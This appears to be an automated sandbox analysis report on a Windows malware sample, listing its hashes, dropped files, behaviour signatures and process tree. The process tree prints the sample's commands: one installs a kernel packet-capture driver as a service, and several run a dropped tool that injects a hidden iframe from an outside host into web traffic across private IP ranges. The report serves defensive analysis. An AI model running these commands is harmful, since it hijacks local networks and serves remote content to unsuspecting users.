Analysis
-
max time kernel
134s -
max time network
139s -
platform
windows10-2004_x64 -
resource
win10v2004-20240802-en -
resource tags
arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system -
submitted
18/08/2024, 14:49
Static task
static1
Behavioral task
behavioral1
Sample
a712dcf9f57862edd33c75e0491fc0c8_JaffaCakes118.exe
Resource
win7-20240704-en
Behavioral task
behavioral2
Sample
a712dcf9f57862edd33c75e0491fc0c8_JaffaCakes118.exe
Resource
win10v2004-20240802-en
General
-
Target
a712dcf9f57862edd33c75e0491fc0c8_JaffaCakes118.exe
-
Size
179KB
-
MD5
a712dcf9f57862edd33c75e0491fc0c8
-
SHA1
84f07f0923b7ed7f294548869ad8c5dd8fcdb32e
-
SHA256
6c26c6482ea1e5de02bf9eef7faa4942c8dcada8ddbf8ad9c00e6e475e170d72
-
SHA512
fa6988943199819e1091a266db224104de34d050d6079a84ca4aaf91d4e18a2c422ddb5799f96706130119f1f5531b9e1b01e957288312e1a9fa0a7bfc8d34bd
-
SSDEEP
3072:HVSsGSTeAcU4V+YR2fwIEE8iRIte5x75rxo+d27B9tO96xz1nnHFaUYSJGOTPjFC:1SnSKAcURYAw23Rrl3d2/tOq1oSJ90+I
Malware Config
Signatures
-
Creates new service(s) 2 TTPs
-
Drops file in Drivers directory 1 IoCs
description ioc Process File created C:\Windows\SysWOW64\drivers\npf.sys a712dcf9f57862edd33c75e0491fc0c8_JaffaCakes118.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-945322488-2060912225-3527527000-1000\Control Panel\International\Geo\Nation a712dcf9f57862edd33c75e0491fc0c8_JaffaCakes118.exe -
Executes dropped EXE 3 IoCs
pid Process 2408 svhstt.exe 3464 svhstt.exe 1692 svhstt.exe -
Loads dropped DLL 18 IoCs
pid Process 2408 svhstt.exe 2408 svhstt.exe 2408 svhstt.exe 2408 svhstt.exe 2408 svhstt.exe 2408 svhstt.exe 3464 svhstt.exe 3464 svhstt.exe 3464 svhstt.exe 3464 svhstt.exe 3464 svhstt.exe 3464 svhstt.exe 1692 svhstt.exe 1692 svhstt.exe 1692 svhstt.exe 1692 svhstt.exe 1692 svhstt.exe 1692 svhstt.exe -
Drops file in System32 directory 5 IoCs
description ioc Process File created C:\Windows\SysWOW64\npptools.dll a712dcf9f57862edd33c75e0491fc0c8_JaffaCakes118.exe File created C:\Windows\SysWOW64\svhstt.exe a712dcf9f57862edd33c75e0491fc0c8_JaffaCakes118.exe File created C:\Windows\SysWOW64\WanPacket.dll a712dcf9f57862edd33c75e0491fc0c8_JaffaCakes118.exe File created C:\Windows\SysWOW64\Packet.dll a712dcf9f57862edd33c75e0491fc0c8_JaffaCakes118.exe File created C:\Windows\SysWOW64\wpcap.dll a712dcf9f57862edd33c75e0491fc0c8_JaffaCakes118.exe -
Launches sc.exe 1 IoCs
Sc.exe is a Windows utlilty to control services on the system.
pid Process 2956 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 5 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language a712dcf9f57862edd33c75e0491fc0c8_JaffaCakes118.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language svhstt.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language svhstt.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language svhstt.exe -
Suspicious behavior: LoadsDriver 15 IoCs
pid Process 640 Process not Found 640 Process not Found 640 Process not Found 640 Process not Found 640 Process not Found 640 Process not Found 640 Process not Found 640 Process not Found 640 Process not Found 640 Process not Found 640 Process not Found 640 Process not Found 640 Process not Found 640 Process not Found 640 Process not Found -
Suspicious use of WriteProcessMemory 12 IoCs
description pid Process procid_target PID 1488 wrote to memory of 2956 1488 a712dcf9f57862edd33c75e0491fc0c8_JaffaCakes118.exe 95 PID 1488 wrote to memory of 2956 1488 a712dcf9f57862edd33c75e0491fc0c8_JaffaCakes118.exe 95 PID 1488 wrote to memory of 2956 1488 a712dcf9f57862edd33c75e0491fc0c8_JaffaCakes118.exe 95 PID 1488 wrote to memory of 2408 1488 a712dcf9f57862edd33c75e0491fc0c8_JaffaCakes118.exe 100 PID 1488 wrote to memory of 2408 1488 a712dcf9f57862edd33c75e0491fc0c8_JaffaCakes118.exe 100 PID 1488 wrote to memory of 2408 1488 a712dcf9f57862edd33c75e0491fc0c8_JaffaCakes118.exe 100 PID 1488 wrote to memory of 3464 1488 a712dcf9f57862edd33c75e0491fc0c8_JaffaCakes118.exe 104 PID 1488 wrote to memory of 3464 1488 a712dcf9f57862edd33c75e0491fc0c8_JaffaCakes118.exe 104 PID 1488 wrote to memory of 3464 1488 a712dcf9f57862edd33c75e0491fc0c8_JaffaCakes118.exe 104 PID 1488 wrote to memory of 1692 1488 a712dcf9f57862edd33c75e0491fc0c8_JaffaCakes118.exe 110 PID 1488 wrote to memory of 1692 1488 a712dcf9f57862edd33c75e0491fc0c8_JaffaCakes118.exe 110 PID 1488 wrote to memory of 1692 1488 a712dcf9f57862edd33c75e0491fc0c8_JaffaCakes118.exe 110
Processes
-
C:\Users\Admin\AppData\Local\Temp\a712dcf9f57862edd33c75e0491fc0c8_JaffaCakes118.exe"C:\Users\Admin\AppData\Local\Temp\a712dcf9f57862edd33c75e0491fc0c8_JaffaCakes118.exe"1⤵
- Drops file in Drivers directory
- Checks computer location settings
- Drops file in System32 directory
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1488 -
C:\Windows\SysWOW64\sc.exe"C:\Windows\system32\sc.exe" create npf binpath= C:\Windows\system32\drivers\npf.sys type= kernel start= demand2⤵
- Launches sc.exe
- System Location Discovery: System Language Discovery
PID:2956
-
-
C:\Windows\SysWOW64\svhstt.exe"C:\Windows\system32\svhstt.exe" -idx 0 -ip 192.168.0.1-192.168.200.254 -port 80 -insert "<iframe src='http://arp.baiduoo.com/arp.htm' width=0 height=0</iframe>"2⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
PID:2408
-
-
C:\Windows\SysWOW64\svhstt.exe"C:\Windows\system32\svhstt.exe" -idx 0 -ip 10.0.1.1-10.0.200.254 -port 80 -insert "<iframe src='http://arp.baiduoo.com/arp.htm' width=0 height=0</iframe>"2⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
PID:3464
-
-
C:\Windows\SysWOW64\svhstt.exe"C:\Windows\system32\svhstt.exe" -idx 0 -ip 172.16.1.1-172.17.254.254 -port 80 -insert "<iframe src='http://arp.baiduoo.com/arp.htm' width=0 height=0</iframe>"2⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
PID:1692
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
86KB
MD59062aeea8cbfc4f0780bbbefad7cebcb
SHA1c4ad39ec51ad0e84fe58f62931d13cddfde3189e
SHA256b2535129b26366484c487cc2ce536d8fcfa9d1ac1dab0db9560b4532012c352c
SHA51260957548fc2272998aea518acf3b1812ed77f73e960a99ddf0d6b474b0858225286c26554bf81c00acf3cb1c77c5ce458d80e149ed4766287d7e32af9681e646
-
Filesize
66KB
MD5fdd104a9fd3427a1df37041fa947a041
SHA1cca1881a3c02033008f78cc39b712b637c7f3e13
SHA256384e928f13bc1c25ca16b3247d7ca942aec6834fadb05b1487f2c975678d4a9a
SHA5129dd082eb245b443cc75b37c69f0a17e15fcb9cdb676b058d87f9805ec7a928e721a681b940fcdd56fd81da4d308f0d514870c526c4f9c715b256a97ab6bb29f7
-
Filesize
41KB
MD5b15e0180c43d8b5219196d76878cc2dd
SHA133e676b37a3380de32c10ba5bc9170997445d314
SHA256a4a102aab8f91a5b452ae2c9a40f5ebc07bc62af892af57d6e3ad1f4340486ab
SHA51247e0e66e89ad11506aff709e7cd5817f5b68bafd5fbc4cc4f4ba5b82b1845977023c90273c58d580266fc8fdcb7fd230ade9c31a8dcc8b9b6ca146423e848a09
-
Filesize
48KB
MD538e7f4e56118d91df929dba40035c017
SHA1a6fe6350e19622fd60561547a6a6882bdc52bfb7
SHA256281908702a725158d3bab00e7adb50069b1035f1bc5562b196c6bd6c49518361
SHA512c4fa93e6760ce1083afbc0a97cd2a3cbece441acd426da547576d5f8c398554e90f3f89a78cedf5d87233e2de8487b8a6779fcf6346920ba873f4923af9324a4
-
Filesize
13KB
MD5ca42539e85a7f9bb372da8124f7a3254
SHA194ada2eaf210d3669b9d6873a5463eda6207a12a
SHA2561a40928fca630e735dac69a800d707b67ed2d05740a0b869f438d1ad8245607f
SHA5124e5a897c9d45611ed9b49185819772a6e08342a2449c9d213be90a37a02cd4004e7728cf131db50e82c696210e51752491ce11ca92528c5a1f5a5b2fde3d0017
-
Filesize
234KB
MD5ce842d25e5b7e6ff21a86cad9195fbe8
SHA1d762270be089a89266b012351b52c595e260b59b
SHA2567e8c0119f352424c61d6fad519394924b7aedbf8bfb3557d53c2961747d4c7f3
SHA51284c23addda6ff006d4a3967b472af10a049b2a045d27d988d22153fc3ba517e21520a31eb061a2ef2abf302e365564dd4601d240ec3d5894fb96f10a9fae97d6